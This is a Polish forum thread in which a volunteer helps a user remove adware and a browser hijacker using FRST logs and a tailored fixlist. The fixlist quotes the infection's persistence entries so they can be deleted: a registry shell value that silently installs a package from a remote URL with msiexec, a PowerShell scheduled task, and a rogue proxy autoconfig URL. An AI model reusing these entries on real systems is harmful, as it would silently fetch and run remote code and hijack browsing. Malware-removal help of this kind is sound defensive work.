milan109 Opublikowano 5 Maja 2017 Zgłoś Udostępnij Opublikowano 5 Maja 2017 (edytowane) Witam serdecznie, Jestem nowym użytkownikiem forum, założyłem konto aby uzyskać pomoc w sprawie złośliwego oprogramowania. Ostatnio mój sprzęt został zainfekowany złośliwym oprogramowaniem, które w sposób nieuprawniony i bez mojej wiedzy dokonuje zmian w wyborze strony startowej, wyszukiwarki czy używanej przeglądarki. Złośliwe oprogramowanie jest w stanie w sposób samodzielny zainstalować przeglądarki Google Chrome czy Mozilla Firefox, pomimo, iż zostały przeze mnie usunięte korzystając z opcji dostępnych w Panelu Sterowania. Lista stron, które mi się pojawiają po uruchomieniu np. Google Chrome: -LuckySite -LuckyStrike -Launchpage.org Wyszukiwarki: - httXX://search3.ozipcompression.com - httXX://nova.rambler.ru - dużo reklam przy korzystaniu z google http://scr.hu/3hh1/ar5kl Do tej pory starałem się używać darmowego oprogramowania,które miało pomóc usunąć złośliwe wirusy oraz jednego płatnego, do którego licencję zakupiłem. Użyte zostały - CCleaner - AwdCleaner (po tym, miałem spokój przez 4 dni) - Malwarebytes - Plumbytes Anti-malware (pełna, płatna wersja) Miałem wyłączony program antywirusowy przez jakiś czas. Podejrzewam, że mogłem zainfekować komputer instalując rozszerzenia do Google Chrome takie jak adblock czy ghostery, które mialy mi pomóc w zwalczaniu reklam i spamu. Screeny z Plumbytes Anti-malware http://scr.hu/3hh1/e2mjj http://scr.hu/3hh1/shxxo Program wykrywa zagrożenia, ale ich NIE USUWA. Po restarcie komputera, ponownym skanowaniu dalej są wykrywane te same złośliwe oprogramowania. Załączono logi z GMER oraz FRST. Znajomy w virtuala, również skarżył się, że został zainfekowany tym samym. Nasze komputery nie mialy bezpośredniego kontaktu (w sensie przekładanie pendrive z jednego urządzenia do drugiego) Do tej pory nie szukałem pomocy na innych forach. Chciałbym uniknąć formatowanie komputera, mnóstwo ważnych dokumentów do pracy (zresztą boje się, ze przy przerzucaniu z komputera na dysk i w drugą stronę mogę również przenieść te wirusy) GMER Log.txt FRST.txt Addition.txt Shortcut.txt Edytowane 5 Maja 2017 przez Rucek Odnośnik do komentarza
Miszel03 Opublikowano 6 Maja 2017 Zgłoś Udostępnij Opublikowano 6 Maja 2017 Nie będę ukrywać, że system jest w stanie agonalnym. Masa infekcji adware / PUP. Zainfekowany został nie tylko system, a również i router (ustawione zostały litewskie adresy - KLIK). Przypuszczalnie na kązdym urządzeniu w tej sieci mogą dziać się różne anomalia w postaci wyskakujących reklam. Sfałszowane też zostały przeglądarki Mozilla FireFox oraz Google Chrome. O skrótach i innych modyfikacjach już nie wspominam. Postaram się to doprowadzić do porządku, ale uprzedzam: łatwo nie będzie. Lektura obowiązkowa, jak nie przeczytasz to grasz nie fair: KLIK. Znajomość zweryfikuję po tym czy pojawisz się w tym dziale z nowymi problemami 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 2. Przez panel sterowania odinstaluj: Kontrowersyjne oprogramowanie, nierekomendowane: Plumbytes Anti-malware. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {21CCB704-AB01-427E-B904-3590081354CD} - \SystemToolsDailyTest -> Brak pliku Task: {671B90D7-2821-4376-85F7-7D3B5FE6EACA} - \Milimili -> Brak pliku Task: {67E32AC8-0D22-4518-BD83-6999DE3BD7AC} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 ShortcutWithArgument: C:\Users\Kris\Desktop\Software\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxps://launchpage.org/?uid=oTlKGKjdhx1sXu8CuYCS%2BMYEvNgv7FP7Xd2TZZRXRwYgKOyPaM9Tqsu%2FMvPi8wooPyk%3Dhoi Winlogon\Notify\igfxcui: HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Run: [background_fault] => C:\Users\Kris\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) C:\Users\Kris\AppData\Local\background_fault\aswRD.exe HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjwdRkJSM8NLOThLNjJWMWH5MjFxMdw3RWLLRTEyRq== /q HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\Policies\Explorer: [] \HKU\S-1-5-18\...\RunOnce: [panda4_2dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f IFEO\DisplaySwitch.exe: [Debugger] GroupPolicy-x32: Ograniczenia GroupPolicyScripts-x32: Ograniczenia AutoConfigURL: [s-1-5-21-3990190956-98265678-2498883457-1001] => hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844 ManualProxies: 0hxxp://unstop.net/wpad.dat?1c5640c07748c6328723300d1080fb3530481844 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422&q={searchTerms} HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 HKU\S-1-5-21-3990190956-98265678-2498883457-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493743025&z=7bc3847637f63c5eafb4c02g5zetcc6m1z4c7eao8t&from=ypid&uid=SanDiskXSDSSDHII240G_144326401422 SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = HKU\S-1-5-21-3990190956-98265678-2498883457-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Zoohair\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Zoohair RemoveDirectory: C:\Users\Kris\AppData\Local\Zoohair R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego] R2 Kitty; C:\Users\Kris\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] R2 SNARE; C:\Users\Kris\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X] U2 McMPFSvc; Brak ImagePath S3 OATool; \??\C:\Users\ADMINI~1\AppData\Local\Temp\OAToolx64.sys [X] RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Kris\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Kris\AppData\Local\Firefox C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Kris\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk FirewallRules: [{C1AAC7C0-CFC0-476B-9704-8C4E1786E18C}] => (Allow) C:\Program Files (x86)\Zoohair\Application\chrome.exe DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Kris\AppData\Local\Mozilla C:\Users\Kris\AppData\Roaming\Mozilla C:\Users\Kris\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Kris\AppData\Local CMD: dir /a C:\Users\Kris\AppData\LocalLow CMD: dir /a C:\Users\Kris\AppData\Roaming CMD: ipconfig /flushdns RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, by cofnąć modyfikacje infekcji. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). zoohair;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
milan109 Opublikowano 6 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 6 Maja 2017 (edytowane) Witaj serdecznie, Litewskie dane sa dlatego, ze przebywam obecnie na Litwie.. Przepraszam, ze nie uwzglednilem tego w 1 poscie, nie sadzilem ze to wazne.. Czy po tej informacji procedura jest taka sama? Edytowane 6 Maja 2017 przez Miszel03 Kasuję zbędne formatowanie z posta. //Miszel03 Odnośnik do komentarza
Miszel03 Opublikowano 6 Maja 2017 Zgłoś Udostępnij Opublikowano 6 Maja 2017 Pomiń pkt. 1 i usuń ze skryptu (pkt. 3) linijkę CMD: ipconfig /flushdns. Odnośnik do komentarza
milan109 Opublikowano 7 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 7 Maja 2017 Gdy odpalam FRST wyskakuje mi taki błąd: http://scr.hu/3hh1/wb1xs Kliknąłem OK i wyskoczyło Failed to Update Zapisałem skrypt w notatniku, dałem napraw... dział skrypt prawie 12h i nic.. mielił i mielił, plik fixlog przestał być modyfkowany kilkanascie minut po uruchomieniu, niemniej zostawiłem to na noc.. rano wyłączyłem, uznałem, że coś się "zacięło".. Przeskanowane jeszcze raz, logi zamieszczone.. Powinienem zostawić to na dłużej? Restart nie nastąpił.. może to przez błąd podczas uruchamiania? Addition.txt FRST.txt Shortcut.txt Fixlog.txt AdwCleanerS1.txt SearchReg.txt Malware.txt Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się